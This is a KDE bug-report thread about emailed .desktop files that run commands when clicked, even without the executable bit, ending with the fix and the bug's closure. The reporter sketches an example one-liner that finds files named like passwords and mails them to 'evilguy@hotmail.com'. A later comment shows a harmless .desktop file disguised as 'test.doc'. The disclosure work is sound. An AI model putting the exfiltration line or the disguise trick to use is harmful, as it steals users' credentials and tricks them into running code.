Version: v1.9.8 (using KDE 3.2.0 RC1, Gentoo) Compiler: gcc version 3.3.2 20031218 (Gentoo Linux 3.3.2-r5, propolice-3.3-7) OS: Linux (i686) release 2.4.24 experimenting with the possible distribution of viruses or just plain mean tricks etc, i thought i'd see how far i could get with a .desktop file. i created a link to an application on the desktop and used "echo 'stuff' > ~/filename" as the command. then i emailed the file to myself. opening the file in kmail was as easy as click, save and then click the file now saved to my desktop. granted, it's not a lethal as the "autoplay" 'feature' in outlook express, but it is worriesome that one can execute emailed code without having to manually set the +x bit. i think it'd be better if .desktop files had to be executeable in order to run like that, otherwise, someone might put something a little meaner inside like: "find ~ -name '*password*' -print0 | xargs -0 cat | <something to do with /usr/sbin/sendmail> evilguy@hotmail.com i'm still a newbie at one liners, but the idea still stands. it's not like it'd spread very well (for now) but the more people that use kde, the more of a problem this could become.
I think this is best assigned to KMail.
There's been a lot of discussion about this in the last couple of days: http://www.geekzone.co.nz/foobar/6229 http://lwn.net/Articles/319072/ This is a serious issue. If Freedesktop.org won't take a step, KDE should be non-compliant on this. +x seems to be the best solution.
And it should not be assigned specifically to Kmail, rather to KDE itself.
yes, patches are being developed against kdelibs, klauncher and krun. so i'm reassigning to kdelibs and changing the priority to critical.
Changing the assignee appropriately.
This is fixed in KDE 4.3, I'm queuing up patches to be backported to KDE 4.2 (although given my real job I'm not sure if I'll make it for KDE 4.2.2 as I want good review).
The file is executed even if it does not have the .desktop extension, it just need the "[Desktop Entry]". I don't know why, but I made some tests, with a odt it opened with OpenOffice (as it should). But then I tried this: I created a file named "test.doc", with this content: "[Desktop Entry] Type=Application Name=test.doc Exec=echo "foo" > test Icon=/usr/share/icons/hicolor/48x48/apps/ooo-writer.png" Then I double click the created file (worked in Dolphin and in Konqueror) and it executed the command (this file "test" was created in my home).
Felipe, I know it's taken awhile for me to respond but I just tried your testcase on KDE trunk and it brought up the warning dialog instead of just executing. What version of KDE did you test this with?
I tested it with KDE 4.2.2.
The patches never got backported to KDE 4.2, due to the risk of breaking 4.2 so this is expected behavior. And since the only reason the bug was left open was in case we decide to backport I'm going to go ahead and close it.
Bug 202626 is asking for some changes in the implement security methods for .desktop files.